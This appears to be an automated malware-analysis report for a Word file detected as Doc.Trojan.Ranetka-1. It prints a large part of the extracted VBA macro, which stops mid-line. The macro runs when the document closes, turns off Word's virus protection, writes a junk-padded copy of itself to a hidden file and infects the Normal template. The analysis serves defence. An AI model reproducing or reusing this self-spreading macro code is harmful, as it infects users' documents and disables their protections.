MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, which are a common method for delivering malware. The macro code attempts to create a file named 'treinfo.___' in the 'c:\windows' directory or the root of C:\. The ClamAV detection 'Doc.Trojan.Ranetka-1' strongly suggests this is a known malware family, likely a downloader or dropper.
Heuristics 2
-
ClamAV: Doc.Trojan.Ranetka-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Ranetka-1
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18509 bytes |
SHA-256: 6954df133e71b04591f3b5bbf02782a207cba645d804f8dadc2410364aed9200 |
|||
|
Detection
ClamAV:
Doc.Trojan.Ranetka-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
U$ = "LT1IIIYeSM>[j2veUj;roKluue;v1OTnrKB8`ZIn]PgxW2Cl1hdlFF9[:dS91jJN_h<6\;KVJv96Lu7]fMV@\xVFLkejmu"
On Error Resume Next
surp = ActiveDocument.Saved
T$ = ":;aS;?V:jfqKFiA636s^5KC<qp>J\4j@BeIDF;Qt\f[:H`eEOvGH8hU;foYCoLZ`YrRv2]8kNwnUoF;"
Application.EnableCancelKey = Not -1
S$ = "?_xT8`2JcdfpUQBM4^JElB:BFwcf`eDkD\\8j4Q:CAQi]]@1Ms`4aBRQBT6f9tg8A;dVG>vq=uu]=ceLm<B:m[vLC3[az=F"
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
M$ = "Ux@0lkm@Iy:rb<HLG8=5dkh^Nr=WWHblT@z;rzr2lk1H>8w4Ya^KxZfpCcf3NGl;J3C7ms4l`iac<x8Pr?LxXcqm=WLWcJ"
Randomize Timer
If Dir("c:\windows", vbDirectory) <> "" Then
If Dir("c:\windows\treinfo.___", 6) = "" Then Open "c:\windows\treinfo.___" For Output As #1
Else
R$ = "UmS6Ccf2T1u5eV7uGRJ3Z?jxDfTFJ\pWn1FL3HrK4XZTRJPD>;H3nU]Q5fI>GqV4ficANRjfkm>@UV5263uLM=Uw"
N$ = "hW98Xxg]::]8ZE3RpbFbSAah2Qfa@T5Y5\xKJjXXH]7"
D$ = "6Pr>eVqgcvlT9rXqRYe1Avcw4i]Hrbl8\eWg_1cR;d8o>@tbB`700UQQJ^gmdP4uOIQc`SnKG_<CKTeRK1rv:@wup7CPL"
R$ = "nEs_JPclOYSA:ktbasj"
If Dir("c:\treinfo.___", 6) = "" Then Open "c:\treinfo.___" For Output As #1
End If
I$ = "p^7JarQx5;VS_VTa1pB?ArHiIF:R=KOJTduV?BN18XiPZCZObwc_X8HorH8Krud_AcI>PnsdPH6TRLj"
For iris = 1 To MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
alco = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(iris, 1)
Y$ = "xg>kY>ZiZgQn\=j7>O:zqVgqMhto@CdpKZhyKaT5X8QUWZzG4T:Trze]@@i\3\?m5d_R[;\2nhoAV685S3o7mwW5"
F$ = "zI5FAjVoDqq5tB7f=xcoI?4oOxs3kB;I4Em=>@MgumBPRcRVBUo:>ZAS1hpBwSGI\4NnzGU?;K4cZfF7>aJaWcNL4SFE"
If iris Mod 2 = 0 And Rnd < 0.3 And alco <> "End Sub" And alco <> "" Then
bukva = CInt((90 - 65) * Rnd) + 65
kol_vo = CInt((100 - 1) * Rnd) + 1
Print #1, Chr$(bukva) + "$=" + Chr$(34);
I$ = "8>_@p=7fonYN1;"
T$ = "]Y_pBY>iy7PcZ]MX2W5ReFSN`U9utL]GWWUoLkXSWXwWg5;q?IYB]smiH:=m2`5;K2471hwFyTAN3K_CZq78UeoHcyo7"
For opa = 1 To kol_vo
V$ = "vAL`d<JhUV<pj9@Jae8vGh"
znak = CInt((122 - 48) * Rnd) + 48
C$ = "ydtGN676XZ;\<QYZvA1sz==h_qSsLIDDB5EkB_>T:EXjRur5mL>[LfNO\7RuE^IAq\R6ttKvoq[Gy1hEoL5M^wnevNT:uv"
Print #1, Chr$(znak);
Q$ = "OfA_:?H;XRKp<XY?[BmXR8okp]ZFbZgiPvriIdM?W4t:Vu1v5_5Y;nL8?g]"
Next opa
T$ = "6;];vkCk^@rOIY`38Ytdr@=Kkwn7kfUKPaNkyg9viqXYc9yo8BkArPr:gKp@lQ3dTF63T]Wi=4tg<]nN;6UUtmIw"
T$ = "rPlngfZqvN1L96[<_Fx:"
F$ = "cLqI2xVN;k^YTdR]oACQvLfRtjpADwuX2rhU8r"
Print #1, Chr$(34)
Print #1, alco
Y$ = "tjTcUV8_ZuAJMlps]gUqE;Cx:NEm6IL5yvreaGrc<nT`FbX7LOWbC9akZOGNC3`8JSTRw"
Else
Print #1, alco
B$ = "kbs7X<[sq4ShuCsX]Sp6vk9tt_VFLm[P<3J5cQP=YYI2UL5QbovE3MaB4tapbo`jY]SCR=?vx5OsWMlpSF2"
E$ = ":FJ5sJJm^Zn<R"
J$ = "^RYoo;_Qo:r<QFoEPXkajAeE:m@1Nm1_pjK6Bm2x?A@N6G4tl\2"
End If
Next iris
F$ = "V2Lj`T_OiJ`je_hv;qZ5Hvrm5qou5=DwMAGRAyNAvxJxFPc4ylO\QQkoiWZc5ICXw]sMEIt8=`<7J4P1Xq6xFyng4c2"
Close #1
SetAttr "c:\treinfo.___", 6
N$ = "`90rKVVZyzGe85vXh3XPD=OEY3qxX?G;o6W@i8EaT7?URtg7@I`9AAMq=r9lKga?O=qDCdC"
X$ = "\kH\`YXbS;lp4;iMYdChBVUImzU>xkb9zRg"
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "Private Sub Document_Close()" Then
O$ = "6:?"
Set times = NormalTemplate.VBProject.VBComponents.Item(1)
P$ = "YrOKMK;uce_4gYLLNs[FHN]iOk_MfYSfLtkrm1PLNN899cCp[X@bJqZnNDnrwhGxMaCN[sCSPNp[[kUWPK[7"
D$ = "fHutdWDJEOrhTl1mIOxi>wCWKI^8rC\@`s=Abyh@e2KQ9o"
ElseIf ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "Private Sub Document_Close()" Then
Set times = ActiveDocument.VBProject.VBComponents.Item(1)
I$ = "J@@aLcLdvE3]jEb2n"
Y$ = "f2RJX8rA]282@PMpk_>[aDp31CxfB3XXNwku140<4u\vB1_AXzJEsV;4J:`e=X9URx:jtxOOjD3F@4g>cMannv:"
Else
L$ = "W43k6Siwoea[H\QG5cII=8:5tFW@hAd2Ug>kkAoblV"
E$ = "3fv`qooG1H:dOh=f5g]\FudV=\2pNCFVBa]Jlyc:^G"
times = ""
V$ = "8aPC7`xS>EUf7mOdG1Sqs3=_McFNv`gDtB`dSF`ZZ@UM"
End If
Y$ = "?E>13s>bM5DtMA_XaCAxyc0b3CKhY]os[M8R8T8qoUYHMY_ZPHv<PBbjO58r2`"
W$ =
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.